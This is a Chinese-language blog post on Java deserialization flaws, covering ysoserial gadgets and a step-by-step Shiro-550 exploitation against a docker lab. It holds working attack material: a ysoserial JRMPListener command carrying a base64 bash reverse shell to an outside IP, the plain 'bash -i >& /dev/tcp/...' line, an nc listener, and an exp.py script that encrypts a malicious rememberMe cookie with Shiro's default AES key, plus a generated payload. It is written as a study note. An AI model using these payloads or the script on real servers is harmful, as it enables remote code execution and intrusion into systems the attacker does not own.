热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

Java反序列化漏洞(ysoserial工具使用、shiro反序列化利用)

Java反序列化机制Java通过writeObject序列化将对象保存为二进制数据流,通过readObject反序列化将序列化后的二进制重新反序列化为Java对象&


Java反序列化机制

Java 通过 writeObject 序列化将对象保存为二进制数据流,通过 readObject 反序列化将序列化后的二进制重新反序列化为 Java 对象,如果一个类 readObject 方法被重写,反序列化时调用的是重写后的 readObject 方法,Java反序列化漏洞就是从可以被恶意利用的 readObject 开始

FileInputStream fileIn = new FileInputStream('1.bin')
ObjectInputStream in = new ObjectInputStream(fileIn)
e = (Employee) in.readObject();

漏洞原理

以一个简单的 demo 为例

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.io.Serializable;
import java.io.FileInputStream;
import java.io.ObjectInputStream;public class demo1{public static void main(String args[]) throws Exception{//定义myObj对象MyObject myObj = new MyObject();myObj.name = "hi";//创建一个包含对象进行反序列化信息的”object”数据文件FileOutputStream fos = new FileOutputStream("object");ObjectOutputStream os = new ObjectOutputStream(fos);//writeObject()方法将myObj对象写入object文件os.writeObject(myObj);os.close();//从文件中反序列化obj对象FileInputStream fis = new FileInputStream("object");ObjectInputStream ois = new ObjectInputStream(fis);//恢复对象MyObject objectFromDisk = (MyObject)ois.readObject();System.out.println(objectFromDisk.name);ois.close();}
}class MyObject implements Serializable {public String name;//重写readObject()方法private void readObject(java.io.ObjectInputStream in) throws IOException, ClassNotFoundException{//执行默认的readObject()方法in.defaultReadObject();//执行打开计算器程序命令String [] cmd={"cmd","/C","calc"};// windows下执行此命令,linux->open /Applications/Calculator.app/Runtime.getRuntime().exec(cmd);}
}

实现 java.io.Serializable 接可才可以被反序列化,而且所有属性必须是可序列化的(用 transient 关键字修饰的属性除外, 不会参与反序列化)

重写了readObject()函数,定制了反序列化的行为,反序列化时首先会调用 readObject,就像 PHP 反序列化时调用 __weakup

image-20211014210927339

image-20211014211002931

ac ed 00 05是 java 序列化内容的特征,如果经过 base64 编码,那么相对应的是rO0AB

Java拥有的丰富的第三方类库,Java 反序列化大多也是因为其类库的安全问题而产生的


漏洞利用


ysoserial


  • ysoserial

    https://github.com/frohoff/ysoserial/

    一款用于生成利用不安全的Java对象反序列化的有效负载的概念验证工具

    Usage: java -jar ysoserial-[version]-all.jar [payload] '[command]'

    base64编码问题:因为 windows 不能在简单的命令行中使用管道符进行 base,所以推荐使用 linux,base64输出时加命令保证不自动换行

    java -jar ysoserial-master-8eb5cbfbf6-1.jar CommonsCollections5 "cmd /c calc" |base64 -w0
    # 还需要进行一次 url 编码

    关于 windows 命令使用可以参考链接

  • http://jackson-t.ca/runtime-exec-payloads.html

    可以通过这个网站找到 payload 编码的命令

    image-20211014222302220


Gadget


  • CommonsCollection

    1-10对应cc版本

  • CommonsBeanUtils

    shiro721中的利用

  • JRMP

    JRMPClient

    JRMPListener

  • URLDNS

  • JNDI

    JNDI (Java Naming and Directory Interface) 是一个应用程序设计的 API,为开发人员提供了查找和访问各种命名和目录服务的通用、统一的接口。JNDI 支持的服务主要有以下几种:DNS、LDAP、 CORBA 对象服务、RMI 等

受此影响到的 Java 组件


  • Shiro:Apache Shiro 是一个强大灵活的开源安全框架,可以完全处理身份验证、授权、加密和会话管理
  • Weblogic:确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器
  • Fastjson/jackson:是Java 库,可以将Java 对象转换为JSON 格式,当然它也可以将JSON 字符串转换为Java 对象
  • Apereo Cas:CAS是一种针对Web的企业多语言单点登录解决方案,并尝试成为您的身份验证和授权需求的综合平台
  • JDBC:JDBC是Java DataBase Connectivity的缩写,它是Java程序访问数据库的标准接口,使用Java程序访问数据库时,Java代码并不是直接通过TCP连接去访问数据库,而是通过JDBC接口来访问,而JDBC接口则通过JDBC驱动来实现真正对数据库的访问
  • XMLDecoder:用于将XMLEncoder创建的xml文档内容反序列化为一个Java对象,其位于java.beans包下
  • Yaml:Yaml是一个可读性高、用来表达数据序列化的格式,类似于XML但比XML更简洁,在Java中,有一个用于解析YAML格式的库,即SnakeYaml,是一个完整的YAML1.1规范Processor,支持UTF-8/UTF-16,支持Java对象的序列化/反序列化,支持所有YAML定义的类型
  • XStream:XStream是Java类库,用来将对象序列化成XML (JSON)或反序列化为对象
  • Websphere:IBM WebSphere® Application Server Community Edition(WASCE)是一款构建于 Apache Geronimo(即 Apache Software Foundation 的开放式源代码应用程序服务器项目)上的、轻量级的 Java 2 Platform,Enterprise Edition(J2EE)应用程序服务器
  • JBoos:是一个基于J2EE的开放源代码的应用服务器,JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用
  • Jenkins:是一个开源的、提供友好操作界面的持续集成(CI)工具,主要用于持续、自动的构建/测试软件项目、监控外部任务的运行,Jenkins用Java语言编写,可在Tomcat等流行的servlet容器中运行,也可独立运行。通常与版本管理工具(SCM)、构建工具结合使用。常用的版本控制工具有SVN、GIT,构建工具有Maven、Ant、Gradle
  • Dubbo:阿里巴巴公司开源的一个高性能优秀的服务框架,使得应用可通过高性能的 RPC 实现服务的输出和输入功能,可以和Spring框架无缝集成
  • 当然还有其他组件

Shiro反序列化

Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理


Shiro框架默认指纹特征

在请求包的COOKIE中为?rememberMe字段赋任意值,收到返回包的 Set-COOKIE 中存在?rememberMe=deleteMe?字段,说明目标有使用Shiro框架,可以进一步测试

image-20211015141523931


shiro-550

漏洞原理

Apache Shiro框架提供了记住我的功能(RememberMe),当接收到未经身份验证的用户请求时,会执行以下操作


  1. 从请求数据包中提取 COOKIE 中 rememberMe 字段的值
  2. 对提取的 COOKIE 值进行 base64 解码
  3. 对 base64 解码后的值进行 AES 解码
  4. 对解密后的字节数组调用 ObjectInputStream.readObject() 方法来反序列化

问题就在于 Shiro 1.2.4及之前的版本 中,AES加密的密钥默认硬编码在代码里,如果服务端采用的是默认的加密密钥,攻击者就可以构造一个恶意对象,执行任意代码

漏洞利用

环境用 docker 搭建

# 获取docker镜像
docker pull medicean/vulapps:s_shiro_1
# 启动docker,注意端口是否在安全组中打开
docker run -d -p 8080:8080 medicean/vulapps:s_shiro_1

访问IP:端口,此页面为搭建成功

image-20211015140842418

有很多图形化的工具,如link,但是为了更好的了解漏洞,分步骤进行利用

检查是否存在默认的key

工具:https://github.com/insightglacier/Shiro_exploit

pip install pycryptodomepython .\shiro_exploit.py -u http://url:port

image-20211015142407101

漏洞利用


  1. 在 vps 上监听 9999 端口

    nc -lvvp 9999

    用来接收反弹的shell

  2. 通过ysoserial中JRMP监听模块,监听 6666 端口并执行反弹shell命令

    java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.JRMPListener 6666 CommonsCollections4 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuMTk2LjE3My4yNTQvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}'# 其中 base 编码通过 http://www.jackson-t.ca/runtime-exec-payloads.html 网站编码,注意此处和端口为上一步 vps 监听端口
    bash -i >& /dev/tcp/121.196.173.254/9999 0>&1
    bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjEuMTk2LjE3My4yNTQvOTk5OSAwPiYx}|{base64,-d}|{bash,-i}

  3. 使用修改后的 exp.py 脚本生成 payload

    python2 .\exp.py 121.196.173.254:6666# 注意 exp.py 和 ysoserial 要在同一目录,端口是 jrmp 监听端口,生成 payload
    rememberMe=deeUXLJaTn+VopkZgKIWVLd7QRdd+x74oPuD6ThOle3otoxxGCfgZQe6Hc6lQZYh+n1i6MmtqB3YYX7fa6Gezwhf6IXZ8FSAR+cpbL7+mIKEpblcXnO9UQTE5VcnDJxXeYS46PgTmHl2Am+acrGLnNBPdpUcyUppXq1PvAK6NEB63kPOpgQPR0fNJGcx1lwZW/ZZh5A70bz+0BuB+VUXy0IO3CxVzsqx+4TH9vEaYEcgFoEgNpHjbLlOV7sSCXwNzjx1dUUAJ2se3Vg2yTDOCqqf0TW4l8KqbFIWIhtnngKX/kcW2Dpjay0aoqkXRs9chL1bSMaX39Uh+x97KBrqnDJAf3oCl80ItwwP3bQyqSix08d8gipHftzHATVNMRR90hhoF3S4Tfvq/xhky8Znzw==

    exp.py

    import sys
    import uuid
    import base64
    import subprocess
    from Crypto.Cipher import AES
    def encode_rememberme(command):popen = subprocess.Popen(['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar', 'JRMPClient', command], stdout=subprocess.PIPE)BS = AES.block_sizepad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()key = base64.b64decode("kPH+bIxk5D2deZiIxcaaaA==")iv = uuid.uuid4().bytesencryptor = AES.new(key, AES.MODE_CBC, iv)file_body = pad(popen.stdout.read())base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))return base64_ciphertextif __name__ == '__main__':payload = encode_rememberme(sys.argv[1])
    print "rememberMe={0}".format(payload.decode())

  4. 构造数据包,伪造COOKIE,发送Payload

    image-20211015144742694

    成功反弹shell

不止这一种漏洞利用方式,还可以直接执行命令,还有 shiro 721漏洞,可以看这篇文章 Link,Link2

人菜就要多学习,本次只是对Java反序列化的简单学习,继续努力


参考链接

https://www.vulbox.com/knowledge/detail/?id=11

https://paper.seebug.org/1503/



推荐阅读
  • 深入解析Java枚举及其高级特性
    本文详细介绍了Java枚举的概念、语法、使用规则和应用场景,并探讨了其在实际编程中的高级应用。所有相关内容已收录于GitHub仓库[JavaLearningmanual](https://github.com/Ziphtracks/JavaLearningmanual),欢迎Star并持续关注。 ... [详细]
  • JavaScript 基础语法指南
    本文详细介绍了 JavaScript 的基础语法,包括变量、数据类型、运算符、语句和函数等内容,旨在为初学者提供全面的入门指导。 ... [详细]
  • 实用正则表达式有哪些
    小编给大家分享一下实用正则表达式有哪些,相信大部分人都还不怎么了解,因此分享这篇文章给大家参考一下,希望大家阅读完这篇文章后大有收获,下 ... [详细]
  • 深入理解Lucene搜索机制
    本文旨在帮助读者全面掌握Lucene搜索的编写步骤、核心API及其应用。通过详细解析Lucene的基本查询和查询解析器的使用方法,结合架构图和代码示例,带领读者深入了解Lucene搜索的工作流程。 ... [详细]
  • 异常要理解Java异常处理是如何工作的,需要掌握一下三种异常类型:检查性异常:最具代表性的检查性异常是用户错误或问题引起的异常ÿ ... [详细]
  • 本文将探讨Java编程语言中对象和类的核心概念,帮助读者更好地理解和应用面向对象编程的思想。通过实际例子和代码演示,我们将揭示如何在Java中定义、创建和使用对象。 ... [详细]
  • 雨林木风 GHOST XP SP3 经典珍藏版 V2017.11
    雨林木风 GHOST XP SP3 经典珍藏版 V2017.11 ... [详细]
  • Java 实现二维极点算法
    本文介绍了一种使用 Java 编程语言实现的二维极点算法。该算法用于从一组二维坐标中筛选出极点,适用于需要处理几何图形和空间数据的应用场景。文章不仅详细解释了算法的工作原理,还提供了完整的代码示例。 ... [详细]
  • 本题来自WC2014,题目编号为BZOJ3435、洛谷P3920和UOJ55。该问题描述了一棵不断生长的带权树及其节点上小精灵之间的友谊关系,要求实时计算每次新增节点后树上所有可能的朋友对数。 ... [详细]
  • ------------------------------————————————————————————————1.定义一个类,实现与被增强对象相同的接口2.在类中定义一个对象,记住被增强 ... [详细]
  • 本文探讨了在Java中如何正确地将多个不同的数组插入到ArrayList中,避免所有数组在插入后变得相同的问题。我们将分析代码中的问题,并提供解决方案。 ... [详细]
  • 深入理解 .NET 中的中间件
    中间件是插入到应用程序请求处理管道中的组件,用于处理传入的HTTP请求和响应。它在ASP.NET Core中扮演着至关重要的角色,能够灵活地扩展和自定义应用程序的行为。 ... [详细]
  • C#设计模式学习笔记:观察者模式解析
    本文将探讨观察者模式的基本概念、应用场景及其在C#中的实现方法。通过借鉴《Head First Design Patterns》和维基百科等资源,详细介绍该模式的工作原理,并提供具体代码示例。 ... [详细]
  • 深入理解Vue.js:从入门到精通
    本文详细介绍了Vue.js的基础知识、安装方法、核心概念及实战案例,帮助开发者全面掌握这一流行的前端框架。 ... [详细]
  • Redux入门指南
    本文介绍Redux的基本概念和工作原理,帮助初学者理解如何使用Redux管理应用程序的状态。Redux是一个用于JavaScript应用的状态管理库,特别适用于React项目。 ... [详细]
author-avatar
手机用户2602939883
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有